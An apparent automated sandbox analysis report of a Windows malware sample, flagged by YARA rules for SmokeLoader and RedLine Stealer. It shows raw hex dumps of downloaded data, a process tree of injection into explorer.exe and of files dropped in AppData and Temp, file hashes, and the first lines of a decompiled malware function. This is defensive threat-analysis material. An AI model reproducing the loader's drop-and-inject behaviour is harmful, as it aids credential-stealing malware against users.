1ff8AAAAAWgAAAAAAAbAAAAAAAAAAAAAAAAAAAAAAAAAAAA4OAAAAG3FAAAAAAAAAAAAAAAAAAAAAAAAAAAA4l3ys3RsAAAAAAAAAAAAAAAAAAAAAAAAAAAAvZudF&ucAAAAAAAAAAAAAAAAAAAAAAAAAAAA4_lz0t zFAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4_
2023-01-03 08:46:54 UTC	512	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-03 08:46:54 UTC	512	IN	Data Raw: 7f 83 a0 76 7f 8b 9b 6e 7f 98 b3 67 8c a1 99 63 81 8d 9f 66 80 7f 9e 72 92 99 a5 61 8b 9b ad 5e 7a 79 80 7e 60 79 80 7e 81 81 7f 51 9f 7e b1 5f 9b 7f a9 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 86 80 80 65 7f 80 7f 5e 80 88 b8 70 80 7f 9d 72 7f 80 ab 79 80 7f a4 7e 7f 87 a6 77 81 81 b1 73 81 7f a2 77 80 7f 99 65 81 82 9f 5c 7f 80 aa 6b 7f 80 ab 6c 7f 7f a5 60 7f 7f a7 60 7e 80 b3 6e 70 73 7e 90 81 7e 80 9f 81 80 94 92 7f 80 93 98 80 81 8b 9e 80 7e 80 97 76 7b 7f 9d 7f 81 81 80 7f 7f 8c 7f 7e 8a 9a 80 81 80 80 7f 7e 8b 88 71 7f 88 a8 5a 80 89 9c 63 81 81 92 75 80 83 9d 79 7e 9c a5 7c 80 83 aa 76 87 89 a6 6d 91 99 a5 6b 80 7e 81 7d 7a 74 7f 86 71 63 81 7f 84 80 82 5a 8f 7f 9f 5d 91 80 b0 52 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: vngcfra^zy~`y~Q~_Ye^pry~wswe\kl``~nps~~~v{~~qZcuy~\|vmk~}ztqcZ]R
2023-01-03 08:46:54 UTC	520	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	520	IN	Data Raw: 32 30 30 30 0d 0a 7e 83 9d 7e 7f 7e 89 80 80 87 91 80 80 8e a3 81 84 7f 95 7e 7f 7e a3 80 7e 7f 7e 81 7f 80 7f 95 6f 80 81 9c 80 81 92 a7 81 7f 81 a2 81 7f 80 a4 80 7f 88 97 7f 80 8c a0 7e 80 7f a1 80 80 80 8a 81 80 80 94 80 81 81 80 7e 80 80 80 81 81 7f 80 7f 7f ab 78 7f 7f ae 63 81 81 b1 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 86 7f 58 81 8b 97 66 80 7f 90 7d 80 84 8f 6d 85 80 94 7f 7f 80 88 7e 7f 84 83 80 7e 7f a8 7e 7e 81 a3 7f 84 7e 9c 80 80 80 7f 7f 7e 7e 81 92 7f 7f 81 90 80 81 8b 83 80 7e 7f 93 7f 7e 80 9e 80 81 7f 94 7f 80 80 9a 7e 7f 80 7f 81 81 80 80 7f 81 7f 7e 80 7f 81 80 81 80 92 7c 82 7f a8 80 80 7e 8d 79 7f 92 96 72 7f 8b 99 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 90 80 5b 80 87 a2 76 7f Data Ascii: 2000~~~~~~~o~~xcoIXf}m~~~~~~~~~~~\|~yrxa[v
2023-01-03 08:46:54 UTC	528	IN	Data Raw: ff ff ff ff ff ff Data Ascii:
2023-01-03 08:46:54 UTC	528	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	528	IN	Data Raw: 32 30 30 30 0d 0a ff ff ff ff ff ff df ff fc 7f 00 ff e0 06 00 ff 80 00 00 7f 80 00 00 7f 00 00 00 7f 00 00 00 7f 00 00 00 7f 00 00 00 7f 80 00 00 ff 80 00 00 ff c0 00 01 ff e0 00 03 ff f0 00 03 ff f0 00 07 ff e0 00 1f ff e0 00 3f ff e0 00 3f ff e0 00 3f ff e0 00 3f ff e0 00 7f ff f0 00 7f ff fc 01 ff ff ff ff ff ff ff ff ff ff 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 3a 3a 00 7e 80 92 00 bd 81 7f 00 7f 38 81 00 7f 80 7f 00 38 3e 3c 00 81 7f a4 00 7e 66 3f 00 87 7e ba 00 81 81 93 00 81 7f 7e 00 80 81 a6 00 63 7f 80 00 81 7e 7f 00 b5 98 51 00 44 44 3d 00 80 7f 93 00 81 31 67 00 bb 7f c1 00 80 80 8b 00 80 7f 80 00 bf 8d b6 00 46 3e 40 00 80 80 81 00 7f 80 97 00 76 81 80 00 7f Data Ascii: 2000????( l::~88><~f?~~c~QDD=1gF>@v
2023-01-03 08:46:54 UTC	536	IN	Data Raw: 80 71 7f 84 81 5a Data Ascii: qZ
2023-01-03 08:46:54 UTC	536	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	536	IN	Data Raw: 32 30 30 30 0d 0a 80 aa aa 6c 7f ab aa 5d 7f 99 9d 5c 7e a7 99 61 81 a4 99 60 80 b1 a5 64 7f a7 99 5c 81 b1 a4 47 87 7f 80 60 97 81 7e 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9e a0 6a 80 a9 7f 76 80 9e 7e 6f 7e ac 84 67 7f 7f 81 7e 61 7f 81 9a 6c 80 7f 91 61 7f 81 a3 80 80 8f 94 80 8f a5 a1 80 7f a3 9a 80 80 96 96 80 7e 8b 9f 80 80 a6 9d 7f 7e b2 95 81 80 91 95 7f 7f a7 9a 81 80 9e 8f 7e 81 91 92 81 80 af a4 7f 7e 92 9d 81 8e 97 9b 80 81 95 95 80 7f 97 9c 81 80 8e 9b 81 88 9c 8f 7e 8a 9f 9e 7f 86 96 a6 7f 80 80 a1 76 80 7f b2 7c 7e 7e a6 72 7f 80 7f 81 80 80 73 81 a4 b2 7a 81 ae ab 64 80 aa ab 62 7e a8 98 63 7f ad ae 5a 7f a6 9c 5f 7f 89 83 62 7f 81 7f 6d 7f 7f 80 51 81 80 7f 62 99 80 7f 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000l]\~a`d\G`~djv~o~g~ala~~~~~v\|~~rszdb~cZ_bmQb[
2023-01-03 08:46:54 UTC	544	IN	Data Raw: 8f 9c 81 80 82 80 Data Ascii:
2023-01-03 08:46:54 UTC	544	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	544	IN	Data Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 61 7f 7e 80 7f 7f 91 90 7e 81 9d 95 7f 7f 80 98 7e 7f 96 a1 80 7f 91 a0 7e 7e 7f 9a 7f 7f 88 a0 80 80 81 9d 80 80 81 a7 80 80 80 9a 7f 80 86 9f 80 7f 8e 9b 7e 7f 81 9f 80 7e a8 a2 7e 80 95 9e 80 80 a1 9f 81 80 a8 ab 7f 81 a7 a3 80 7f 99 96 79 7f 82 96 80 7f 7e 6a 00 00 00 00 00 00 00 00 71 80 7f 7f 7d 7f 7f 7f 7f 80 88 9a 6a 7f 80 a8 80 80 81 9d 80 80 8b 93 81 7f aa 93 7f 81 96 a2 80 81 a0 a2 7f 7e a1 95 7f 7f 8b ac 81 7f 80 8c 7f 7f 80 a8 81 80 98 ac 80 81 9d 9f 7f 7f 99 ae 81 7f a4 94 80 81 8d 94 80 81 9b 98 80 80 95 94 68 81 7f 7f 80 96 7f 60 00 00 00 00 00 00 00 00 7f a0 9c 5d 7f 80 80 80 78 80 7e 7f 7d 81 7f 9c 80 7e 8a 95 80 81 95 a2 80 80 8e a4 7f 7f 9d 93 7f 7e a2 93 81 81 a6 a2 81 80 92 a4 7e 7f 7f 9e 80 Data Ascii: 2000a~~~~~~~~y~jq}j~h`]x~}~~~
2023-01-03 08:46:54 UTC	552	IN	Data Raw: 8f fc fc fc fc fc Data Ascii:
2023-01-03 08:46:54 UTC	552	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	552	IN	Data Raw: 32 30 30 30 0d 0a 59 ec 25 25 25 25 25 25 08 c6 26 68 68 e9 68 e9 68 68 e9 51 af 6d f5 64 c9 72 f2 08 08 08 08 08 ce 25 25 25 25 25 25 25 08 c6 10 ad ad ad 93 cd ad cd cd 6f 3e 36 dc 3a 63 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 08 f8 c6 c6 ab ab 11 ab ab 11 12 6b eb b6 bb 6b 5f 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 08 08 08 08 08 08 08 08 b5 f1 e1 c4 f3 54 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 30 fe 28 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 Data Ascii: 2000Y%%%%%%&hhhhhQmdr%%%%%%%o>6:c%%%%%%%%%%%%%%%kk_%%%%%%%%%%%%%%%%T%%%%%%%%%%%%%%%%%%%%%%%%%%%0(%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
2023-01-03 08:46:54 UTC	560	IN	Data Raw: bd c6 81 96 cf d3 Data Ascii:
2023-01-03 08:46:54 UTC	560	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	560	IN	Data Raw: 32 30 30 30 0d 0a 7e b1 c0 c0 97 ba c3 d2 7e 7e b2 d0 3c 7f 90 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3d 80 97 c9 7f 7f b2 cb 8c ae c3 c9 80 99 c4 cd 80 90 bf c4 81 98 c8 c5 80 97 c8 cb 80 8c c1 ca 80 8e c2 c4 7e 8d c3 c9 80 8a c5 c5 80 97 c7 ce 7e 8f ca cf 7e 8b bb c6 81 87 c7 c9 80 8f c7 cc 80 8f cf c4 7f 8f ba c0 81 8c d0 bf 7f 8f c3 d2 7f 94 c1 c5 75 7f 80 cd 43 80 62 ce 7e ab 98 c2 81 ae 81 cc 7e b1 80 c0 81 b8 7f cc c0 cb bb d1 48 80 64 d0 7a 7f 7f c8 7e a8 c4 cb 7f ae c2 cb 7f a2 ca c6 80 ad c2 c1 7f a3 c7 cf 7f 9e ca d1 80 a8 c8 c6 7f b1 bb d0 81 a2 cd c6 81 ac c5 c6 7e bc cc d7 7f 80 b2 bd 34 81 9b cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 cb 98 3b 3d 80 88 c9 7f 7e b1 c5 86 b8 cd c6 7f 91 be c0 7f 9a c4 c6 7f Data Ascii: 2000~~~<=~~~uCb~~Hdz~~4;=~
2023-01-03 08:46:54 UTC	568	IN	Data Raw: 64 c1 7e 9a 81 c8 Data Ascii: d~
2023-01-03 08:46:54 UTC	568	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	569	IN	Data Raw: 31 66 66 38 0d 0a 80 c4 82 c6 7e a3 7e c5 45 80 63 bf 56 80 69 7f a5 d9 a0 3e a8 d0 97 45 aa d4 94 3a b2 cb 93 3d af d0 9d 3b ac d1 9c 36 c4 d8 7f 42 b5 c7 88 41 b7 c9 88 33 b0 cc 80 3d bd c5 8d 44 cb ce 80 2e 00 00 00 00 00 00 00 00 c3 d9 99 2f 7f 8a a1 42 3f 81 90 c6 3c 80 8f d2 4e 7e 9a cd 40 80 96 c0 45 81 83 d9 43 80 91 cf 4b 7f 99 c8 3e 7e 8c d2 44 80 80 c9 41 7e 5c bf 7d 80 81 c2 7e 91 80 cc 73 81 7f ca 3e 7e 61 b7 56 81 61 7f 7f 80 7f 4d a9 da 99 36 a4 d1 98 4a 9d cf a4 47 b4 d4 9b 42 a4 c9 8e 43 a4 d3 92 44 a0 d4 a1 43 b1 c9 98 36 ad c5 9e 3b af d4 8c 38 b5 d2 99 38 b5 d3 90 35 b1 cc 92 31 bf c8 96 2f 00 00 00 00 00 00 00 00 00 00 00 00 c0 d1 97 2b c3 ca a9 2f ab cb a5 32 b1 ce 95 3c a7 d5 98 4c ae cb 7f 40 b5 c9 8d 59 80 81 81 7f 80 81 7e 81 7f Data Ascii: 1ff8~~EcVi>E:=;6BA3=D./B?<N~@ECK>~DA~\}~s>~aVaM6JGBCDC6;8851/+/2<L@Y~
2023-01-03 08:46:54 UTC	577	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-01-03 08:46:54 UTC	577	IN	Data Raw: 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 0f ff fc 00 1f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 28 00 00 00 18 00 00 00 30 00 00 00 01 00 08 00 00 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 4a 3d 41 00 7e 7f 80 00 43 4f 4a 00 4b 42 44 00 7f 7f 7f 00 3e 49 44 00 42 42 4d 00 a8 96 7f 00 4b 3d 4f 00 52 45 44 00 7e 8c 81 00 7f 7e 7f 00 96 7f 84 00 a2 b2 a9 00 7e 87 89 00 7e 7f 80 00 a9 92 81 00 a4 9d 81 00 80 7f 7f 00 85 81 7e 00 42 4b 45 00 9e 92 88 00 7e 81 81 00 7f 80 81 00 7f 80 7e 00 81 7e 80 Data Ascii: (0@J=A~COJKBD>IDBBMK=ORED~~~~~BKE~~~
2023-01-03 08:46:54 UTC	585	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	585	IN	Data Raw: 32 30 30 30 0d 0a 80 80 7f 9c 7f 87 84 a3 91 a5 9c 9c 81 7f 7f 9b 7e 80 80 94 7e a1 80 5a 7e be 7f 61 80 a1 81 59 80 ad 7f 59 00 00 00 00 00 00 00 00 ad 98 86 3b 97 9a 8d 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 ae 92 5d 86 a0 7e 6d 91 ad 80 5c 80 7f 7f a4 7f 80 80 9b 9b 9f a7 a2 9a 9a 8b a1 7e 80 80 a0 7f 80 80 93 96 94 8f a5 9c 98 93 9a 9b 92 96 ae 94 a5 93 98 a4 a2 95 99 a9 9a a5 9d a9 a7 a8 99 a5 9f 97 a8 9f 99 9c 97 b3 a5 8f a6 a5 9c 92 a8 a8 ab 96 9b 9b 9a 97 9c 92 9e 98 9d 97 ad 98 a8 a5 a4 9e 9f 9b ae ab a5 a9 95 99 a9 87 a5 8c a1 80 80 80 9c 80 7f 7e a8 7f 84 7f 9c 93 a1 99 ab 80 80 7f 96 80 81 81 9f 90 a4 80 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 92 84 4b 00 00 00 00 00 00 00 00 00 Data Ascii: 2000~~Z~aYY;C]~m\~~cK
2023-01-03 08:46:54 UTC	593	IN	Data Raw: 7f 7f 81 80 81 af Data Ascii:
2023-01-03 08:46:54 UTC	593	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	593	IN	Data Raw: 32 30 30 30 0d 0a 81 80 80 a2 7f 80 81 b5 81 7f 80 9c 7e 81 80 9d 7e 7e 7f a2 81 7f 81 a5 7f 7e 7f 98 80 7f 7f a4 7e 80 80 a2 80 7e 7e ae 7f 81 7e a3 80 80 7e a4 7e 80 7f 9d 7e 81 80 99 7e 7e 7f 88 7f 7f 81 a0 80 81 7f 7f 7f a1 81 6f 80 b9 80 6f 7e ac 7f 64 59 9c 7e 50 1a e6 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f ad 7f 5d 80 b4 80 58 80 a1 7f 55 87 b0 91 59 7e ad 9a 61 80 ab 89 5f 00 00 00 00 81 a6 8d 55 80 8d 98 5d 80 8d 8a 5e 81 97 89 73 89 97 82 5e 9f a1 7e 63 8f 95 7f 66 9e 9c 81 62 9a a1 80 63 95 ae 81 6c 84 a7 81 5b 8f a7 7e 58 8b aa 7f 65 8f a7 7e 61 8e aa 7f 59 9e be 7e 63 7e a3 80 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8f a0 7f 42 89 b2 7e 3e 80 Data Ascii: 2000~~~~~~~~~~~~~oo~dY~Pw]XUY~a_U]^s^~cfbcl[~Xe~aY~c~lB~>
2023-01-03 08:46:54 UTC	601	IN	Data Raw: ff ff ff ff 00 00 Data Ascii:
2023-01-03 08:46:54 UTC	601	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	601	IN	Data Raw: 32 30 30 30 0d 0a 28 00 00 00 20 00 00 00 40 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 81 7f 00 8b 80 7e 00 80 4e 7f 00 9d 80 a7 00 7f 7d b5 00 81 81 8f 00 a8 81 7f 00 6d 50 7f 00 9e 88 99 00 5c 5b 56 00 80 55 7f 00 a8 a8 ab 00 80 ad 7f 00 84 80 80 00 7f 7c 59 00 7f 80 b6 00 5f 49 4a 00 7e 96 5c 00 7f 81 a0 00 7f 89 a2 00 7f 52 80 00 82 84 99 00 8d 50 9f 00 81 81 7e 00 7e 4c 80 00 7f 5f 55 00 9d b0 81 00 80 80 55 00 a1 81 7f 00 80 80 48 00 7f 7e b3 00 80 7e a3 00 96 63 a9 00 80 58 a8 00 81 7f a5 00 a1 ac a3 00 80 7e 80 00 7f 57 79 00 80 58 56 00 9f 80 80 00 a8 85 7f 00 ad 98 9f 00 7f 5a 7e 00 7f 7e 7f 00 7e 81 7f 00 7e 53 61 00 ae af aa 00 99 7e 80 00 80 7f b1 00 a3 5f 5c 00 7e a9 7f 00 7c 4e 58 00 80 Data Ascii: 2000( @~N}mP\[VU\|Y_IJ~\RP~~L_UUH~~cX~WyXVZ~~~~Sa~_\~\|NX
2023-01-03 08:46:54 UTC	609	IN	Data Raw: 91 9f a0 84 97 9b Data Ascii:
2023-01-03 08:46:54 UTC	609	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	609	IN	Data Raw: 32 30 30 30 0d 0a 94 94 8b a3 9e 98 88 a6 89 80 87 a2 88 93 8a a4 9d 7e 80 a1 80 8e 81 97 92 90 95 9f 91 91 95 a4 94 89 a0 98 92 98 95 b3 a0 a5 9a 9e 80 81 7f a8 7e 81 80 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 81 80 80 96 7e 7f 80 ac a4 ab a6 99 95 a2 9c a9 a7 a5 94 a9 9b 9c 9b a4 a1 aa 9f a3 9b 9e 95 a0 a6 a1 a1 ab 9b a0 a2 a7 a6 95 aa aa a1 91 a8 ae a4 a5 8f a0 96 a1 9a b6 7f 7f 7f af 76 80 80 9d 66 81 7e a6 71 80 7e b5 80 80 7f 9d 80 80 7e a8 81 7f 7f a1 82 83 8a a6 8d 9a 98 a2 98 96 91 99 97 8e 91 a6 8e 9a 9c 94 8b 93 87 ae 9c 94 8c b8 87 9c 8f a7 9c 90 9d 9e 90 8d 94 a9 91 87 97 a6 99 99 86 a9 99 97 88 ac 97 88 9d a8 84 9b 9c a1 8a 9a 7e a6 93 92 99 a7 8d 84 95 b1 8c a3 9a b4 80 81 7e af 80 7f 7f 9f 00 00 00 00 00 Data Ascii: 2000~~~vf~q~~~~
2023-01-03 08:46:54 UTC	617	IN	Data Raw: 89 ae 84 84 93 a2 Data Ascii:
2023-01-03 08:46:54 UTC	617	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	617	IN	Data Raw: 32 30 30 30 0d 0a 91 95 8c a9 94 92 96 aa 96 9f 90 a3 8f 99 93 9f 94 88 8a ae 90 99 8e a4 96 96 94 aa a3 8b 9e 9e 81 7f 7e b3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7f 7e 9c 83 8c 88 ae 9d a5 9f a2 9d 9d 93 ab 9c 9e 9b 9d 99 a1 92 9e 95 9e 8c 98 8c 9d 96 a7 9a 93 94 ac 80 80 84 a2 76 7f 7e ac 80 7f 80 a7 81 7f 91 9f 81 80 7f a3 80 80 7f ab 80 7e 81 a5 80 80 80 a6 93 8f 92 ad 9b 93 8e a7 8e 9d 8f a9 83 8f 9d a6 8a 93 97 a4 9b 90 8f b3 9b 9f 95 aa 95 7f 8d a2 99 9a 9a a5 9a 99 a2 a0 80 80 80 a5 a3 7f 80 56 00 00 00 00 00 00 00 00 00 00 00 00 7f 7f 81 a4 8c 85 8a a8 9c b3 a3 a9 98 ab a0 b2 a6 94 a1 b4 a0 99 9e a8 9f a5 99 ac 95 9b 92 ac 93 99 a5 ac a5 a4 99 b8 77 7f 80 ab 80 7e 97 a6 7f ac a2 ad 7f ad 9f a0 80 7e ad 9c 80 7f 80 b3 80 81 7e ae 80 Data Ascii: 2000~~v~~Vw~~~
2023-01-03 08:46:54 UTC	625	IN	Data Raw: 00 69 69 69 69 00 Data Ascii: iiii
2023-01-03 08:46:54 UTC	625	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	625	IN	Data Raw: 32 30 30 30 0d 0a 69 00 00 00 00 69 69 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 00 69 69 69 69 69 69 69 69 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 69 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 69 69 69 69 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 69 69 69 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 2000iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
2023-01-03 08:46:54 UTC	633	IN	Data Raw: f4 36 28 38 2c 38 Data Ascii: 6(8,8
2023-01-03 08:46:54 UTC	633	IN	Data Raw: 0d 0a Data Ascii:
2023-01-03 08:46:54 UTC	633	IN	Data Raw: 65 34 38 0d 0a 30 38 34 38 38 38 3c 38 40 38 44 38 48 38 4c 38 d0 3c c8 3d 30 3e 40 3e 50 3e 60 3e 70 3e 94 3e a0 3e a4 3e a8 3e ac 3e b0 3e b8 3e bc 3e c0 3e c4 3e d4 3e dc 3e e4 3e ec 3e f4 3e fc 3e 04 3f 0c 3f 14 3f 1c 3f 24 3f 2c 3f 34 3f 3c 3f 44 3f 4c 3f 54 3f 5c 3f 64 3f 6c 3f 74 3f 7c 3f 84 3f 8c 3f 94 3f 9c 3f a4 3f ac 3f b4 3f e0 3f e4 3f e8 3f ec 3f f0 3f f4 3f f8 3f fc 3f 00 20 01 00 70 00 00 00 00 30 04 30 08 30 0c 30 10 30 14 30 18 30 1c 30 20 30 24 30 28 30 2c 30 30 30 34 30 38 30 3c 30 40 30 44 30 48 30 4c 30 50 30 54 30 58 30 5c 30 60 30 64 30 68 30 6c 30 70 30 74 30 78 30 7c 30 80 30 84 30 88 30 8c 30 90 30 a0 30 a8 30 ac 30 b0 30 b4 30 b8 30 bc 30 c0 30 c4 30 c8 30 cc 30 d8 30 c0 31 c4 31 40 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: e48084888<8@8D8H8L8<=0>@>P>`>p>>>>>>>>>>>>>>>>>????$?,?4?<?D?L?T?\?d?l?t?\|???????????????? p00000000 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0\|00000000000000000011@5

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 4712, Parent PID: 3324

General

Target ID:	1
Start time:	09:44:59
Start date:	03/01/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	341504 bytes
MD5 hash:	D0BF82E7840B3179B85D665A3AE895A5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.448104773.00000000005E6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000003.363432938.0000000000540000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.447899636.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3324, Parent PID: 4712

General

Target ID:	6
Start time:	09:45:40
Start date:	03/01/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69bc80000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: vgfsabtPID: 3120, Parent PID: 1084

General

Target ID:	9
Start time:	09:46:26
Start date:	03/01/2023
Path:	C:\Users\user\AppData\Roaming\vgfsabt
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\vgfsabt
Imagebase:	0x400000
File size:	341504 bytes
MD5 hash:	D0BF82E7840B3179B85D665A3AE895A5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 1E3.exePID: 3536, Parent PID: 3324

General

Target ID:	10
Start time:	09:46:54
Start date:	03/01/2023
Path:	C:\Users\user\AppData\Local\Temp\1E3.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\1E3.exe
Imagebase:	0x400000
File size:	650752 bytes
MD5 hash:	B2FDE4A8B7D6AA7E0FA7F853899F1C4F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 4712, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	57.5%
Signature Coverage:	26.1%
Total number of Nodes:	153
Total number of Limit Nodes:	12

Executed Functions

Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00401615(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16, signed int _a1750575217) {
				void* _v3;
				void* _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				HANDLE* _v72;
				char _v76;
				char _v84;
				char _v88;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t91;
				intOrPtr _t93;
				void* _t96;
				intOrPtr _t97;
				struct _GUID _t103;
				signed char* _t105;
				PVOID* _t107;
				PVOID* _t111;
				PVOID* _t113;
				void* _t117;
				intOrPtr _t118;
				void* _t120;
				void** _t121;
				signed char _t124;
